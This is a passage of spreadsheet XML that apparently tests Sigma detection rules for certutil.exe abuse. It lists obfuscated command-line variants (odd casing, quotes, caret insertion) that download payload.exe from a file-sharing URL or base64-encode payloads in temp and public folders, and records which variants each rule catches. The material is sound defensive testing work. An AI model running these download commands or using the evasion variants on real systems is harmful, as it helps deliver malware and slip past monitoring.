      <c r="C655" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D655" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E655" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"urlcache" -split -f https://rentry.co/example123/raw C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F655" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G655" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H655" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I655" s="36" t="n"/>
      <c r="J655" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K655" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="656" ht="15.75" customHeight="1" s="42">
      <c r="A656" s="43" t="n"/>
      <c r="B656" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C656" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D656" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E656" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -f https://rentry.co/example123/raw C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F656" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G656" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H656" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I656" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J656" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K656" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="657" ht="15.75" customHeight="1" s="42">
      <c r="A657" s="43" t="n"/>
      <c r="B657" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C657" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D657" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E657" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urLcAChE -sPLIT -f https://rentry.co/example123/raw C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F657" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G657" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H657" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I657" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J657" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K657" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="658" ht="15.75" customHeight="1" s="42">
      <c r="A658" s="43" t="n"/>
      <c r="B658" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C658" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D658" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E658" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -splIt -f https://rentry.co/example123/raw C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F658" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G658" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H658" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I658" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J658" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K658" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="659" ht="15.75" customHeight="1" s="42">
      <c r="A659" s="43" t="n"/>
      <c r="B659" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C659" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D659" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E659" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urLcAChe /"split" -f https://rentry.co/example123/raw C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F659" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G659" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H659" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I659" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J659" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K659" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="660" ht="15.75" customHeight="1" s="42">
      <c r="A660" s="43" t="n"/>
      <c r="B660" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C660" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D660" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E660" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"urlcache" -sPlIt -F https://rentry.co/example123/raw C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F660" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G660" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H660" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I660" s="43" t="n"/>
      <c r="J660" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K660" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="661" ht="15.75" customHeight="1" s="42">
      <c r="A661" s="43" t="n"/>
      <c r="B661" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode</t>
        </is>
      </c>
      <c r="C661" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D661" s="36" t="inlineStr">
        <is>
          <t>e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a</t>
        </is>
      </c>
      <c r="E661" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"encodehex" input.txt output.txt 1</t>
        </is>
      </c>
      <c r="F661" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G661" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H661" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I661" s="36" t="n"/>
      <c r="J661" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K661" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="662" ht="15.75" customHeight="1" s="42">
      <c r="A662" s="43" t="n"/>
      <c r="B662" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode</t>
        </is>
      </c>
      <c r="C662" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D662" s="36" t="inlineStr">
        <is>
          <t>e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a</t>
        </is>
      </c>
      <c r="E662" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"e^ncode" input.txt output.txt</t>
        </is>
      </c>
      <c r="F662" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G662" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H662" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I662" s="36" t="n"/>
      <c r="J662" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K662" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="663" ht="15.75" customHeight="1" s="42">
      <c r="A663" s="43" t="n"/>
      <c r="B663" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode</t>
        </is>
      </c>
      <c r="C663" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D663" s="36" t="inlineStr">
        <is>
          <t>e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a</t>
        </is>
      </c>
      <c r="E663" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"e^ncode" input.txt output.txt</t>
        </is>
      </c>
      <c r="F663" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G663" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H663" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I663" s="36" t="n"/>
      <c r="J663" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K663" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="664" ht="15.75" customHeight="1" s="42">
      <c r="A664" s="43" t="n"/>
      <c r="B664" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode</t>
        </is>
      </c>
      <c r="C664" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D664" s="36" t="inlineStr">
        <is>
          <t>e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a</t>
        </is>
      </c>
      <c r="E664" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /E^Ncode input.txt output.txt</t>
        </is>
      </c>
      <c r="F664" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G664" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H664" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I664" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J664" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K664" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="665" ht="15.75" customHeight="1" s="42">
      <c r="A665" s="43" t="n"/>
      <c r="B665" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode</t>
        </is>
      </c>
      <c r="C665" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D665" s="36" t="inlineStr">
        <is>
          <t>e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a</t>
        </is>
      </c>
      <c r="E665" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /e^nCode input.txt output.txt</t>
        </is>
      </c>
      <c r="F665" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G665" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H665" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I665" s="43" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J665" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K665" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="666" ht="15.75" customHeight="1" s="42">
      <c r="A666" s="43" t="n"/>
      <c r="B666" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode</t>
        </is>
      </c>
      <c r="C666" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D666" s="36" t="inlineStr">
        <is>
          <t>e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a</t>
        </is>
      </c>
      <c r="E666" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /e^NcODE input.txt output.txt</t>
        </is>
      </c>
      <c r="F666" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G666" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H666" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I666" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J666" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K666" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="667" ht="15.75" customHeight="1" s="42">
      <c r="A667" s="43" t="n"/>
      <c r="B667" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_extensions</t>
        </is>
      </c>
      <c r="C667" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D667" s="36" t="inlineStr">
        <is>
          <t>ea0cdc3e-2239-4f26-a947-4e8f8224e464</t>
        </is>
      </c>
      <c r="E667" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -encode payload.bin encoded_payload.txt</t>
        </is>
      </c>
      <c r="F667" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G667" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H667" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I667" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J667" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K667" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="668" ht="15.75" customHeight="1" s="42">
      <c r="A668" s="43" t="n"/>
      <c r="B668" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_extensions</t>
        </is>
      </c>
      <c r="C668" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D668" s="36" t="inlineStr">
        <is>
          <t>ea0cdc3e-2239-4f26-a947-4e8f8224e464</t>
        </is>
      </c>
      <c r="E668" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"encode" payload.bin encoded_payload.txt</t>
        </is>
      </c>
      <c r="F668" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G668" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H668" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I668" s="43" t="n"/>
      <c r="J668" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K668" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="669" ht="15.75" customHeight="1" s="42">
      <c r="A669" s="43" t="n"/>
      <c r="B669" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_extensions</t>
        </is>
      </c>
      <c r="C669" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D669" s="36" t="inlineStr">
        <is>
          <t>ea0cdc3e-2239-4f26-a947-4e8f8224e464</t>
        </is>
      </c>
      <c r="E669" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -EncodE payload.bin encoded_payload.txt</t>
        </is>
      </c>
      <c r="F669" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G669" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H669" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I669" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J669" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K669" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="670" ht="15.75" customHeight="1" s="42">
      <c r="A670" s="43" t="n"/>
      <c r="B670" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_extensions</t>
        </is>
      </c>
      <c r="C670" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D670" s="36" t="inlineStr">
        <is>
          <t>ea0cdc3e-2239-4f26-a947-4e8f8224e464</t>
        </is>
      </c>
      <c r="E670" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -encODe payload.bin encoded_payload.txt</t>
        </is>
      </c>
      <c r="F670" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G670" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H670" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I670" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J670" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K670" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="671" ht="15.75" customHeight="1" s="42">
      <c r="A671" s="43" t="n"/>
      <c r="B671" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_extensions</t>
        </is>
      </c>
      <c r="C671" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D671" s="36" t="inlineStr">
        <is>
          <t>ea0cdc3e-2239-4f26-a947-4e8f8224e464</t>
        </is>
      </c>
      <c r="E671" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"encode" payload.bin encoded_payload.txt</t>
        </is>
      </c>
      <c r="F671" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G671" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H671" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I671" s="36" t="n"/>
      <c r="J671" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K671" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="672" ht="15.75" customHeight="1" s="42">
      <c r="A672" s="43" t="n"/>
      <c r="B672" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_extensions</t>
        </is>
      </c>
      <c r="C672" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D672" s="36" t="inlineStr">
        <is>
          <t>ea0cdc3e-2239-4f26-a947-4e8f8224e464</t>
        </is>
      </c>
      <c r="E672" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -eNCOde payload.bin encoded_payload.txt</t>
        </is>
      </c>
      <c r="F672" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G672" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H672" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I672" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J672" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K672" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="673" ht="15.75" customHeight="1" s="42">
      <c r="A673" s="43" t="n"/>
      <c r="B673" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_extensions</t>
        </is>
      </c>
      <c r="C673" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D673" s="36" t="inlineStr">
        <is>
          <t>ea0cdc3e-2239-4f26-a947-4e8f8224e464</t>
        </is>
      </c>
      <c r="E673" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -eNCoDE payload.bin encoded_payload.txt</t>
        </is>
      </c>
      <c r="F673" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G673" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H673" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I673" s="43" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J673" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K673" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="674" ht="15.75" customHeight="1" s="42">
      <c r="A674" s="43" t="n"/>
      <c r="B674" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_extensions</t>
        </is>
      </c>
      <c r="C674" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D674" s="36" t="inlineStr">
        <is>
          <t>ea0cdc3e-2239-4f26-a947-4e8f8224e464</t>
        </is>
      </c>
      <c r="E674" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -ENcODE payload.bin encoded_payload.txt</t>
        </is>
      </c>
      <c r="F674" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G674" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H674" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I674" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J674" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K674" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="675" ht="15.75" customHeight="1" s="42">
      <c r="A675" s="43" t="n"/>
      <c r="B675" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C675" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D675" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E675" s="36" t="inlineStr">
        <is>
          <t>cd C:\Windows\Temp &amp;&amp; certutil.exe -encode payload.exe payload.b64</t>
        </is>
      </c>
      <c r="F675" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G675" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H675" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I675" s="43" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J675" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K675" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="676" ht="15.75" customHeight="1" s="42">
      <c r="A676" s="43" t="n"/>
      <c r="B676" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C676" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D676" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E676" s="36" t="inlineStr">
        <is>
          <t>cd C:\Windows\Temp &amp;&amp; certutil.exe -"encode" payload.exe payload.b64</t>
        </is>
      </c>
      <c r="F676" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G676" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H676" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I676" s="43" t="n"/>
      <c r="J676" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K676" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="677" ht="15.75" customHeight="1" s="42">
      <c r="A677" s="43" t="n"/>
      <c r="B677" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C677" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D677" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E677" s="36" t="inlineStr">
        <is>
          <t>cd C:\Windows\Temp &amp;&amp; certutil.exe -eNCOde payload.exe payload.b64</t>
        </is>
      </c>
      <c r="F677" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G677" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H677" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I677" s="43" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J677" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K677" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="678" ht="15.75" customHeight="1" s="42">
      <c r="A678" s="43" t="n"/>
      <c r="B678" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C678" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D678" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E678" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"encode" "C:\Users\Public\" payload.exe "C:\Users\Public\" payload.b64</t>
        </is>
      </c>
      <c r="F678" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G678" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H678" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I678" s="36" t="n"/>
      <c r="J678" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K678" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="679" ht="15.75" customHeight="1" s="42">
      <c r="A679" s="43" t="n"/>
      <c r="B679" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C679" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D679" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E679" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"encode" "C:\Users\Public\" payload.exe "C:\Users\Public\" payload.b64</t>
        </is>
      </c>
      <c r="F679" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G679" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H679" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I679" s="43" t="n"/>
      <c r="J679" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K679" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="680" ht="15.75" customHeight="1" s="42">
      <c r="A680" s="43" t="n"/>
      <c r="B680" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C680" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D680" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E680" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -encode C:\ProgramData\payload.exe C:\ProgramData\payload.b64</t>
        </is>
      </c>
      <c r="F680" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G680" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H680" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I680" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J680" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K680" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="681" ht="15.75" customHeight="1" s="42">
      <c r="A681" s="43" t="n"/>
      <c r="B681" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C681" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D681" s="36" t="inlineStr">
        <is>
          <t>82a6714f-4899-4f16-9c1e-9a333544d4c3</t>
        </is>
      </c>
      <c r="E681" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -eNCode C:\ProgramData\payload.exe C:\ProgramData\payload.b64</t>
        </is>
      </c>
      <c r="F681" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G681" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H681" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I681" s="36" t="inlineStr">
        <is>
          <t>File Encoded To Base64 Via Certutil.EXE (e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a)</t>
        </is>
      </c>
      <c r="J681" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K681" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="682" ht="15.75" customHeight="1" s="42">
      <c r="A682" s="43" t="n"/>
      <c r="B682" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_encode_susp_location</t>
        </is>
      </c>
      <c r="C682" s="36" t="inlineStr">
        <is>
          <t>File In Suspicious Location Encoded To Base64 Via Certutil.EXE</t>
        </is>
      </c>
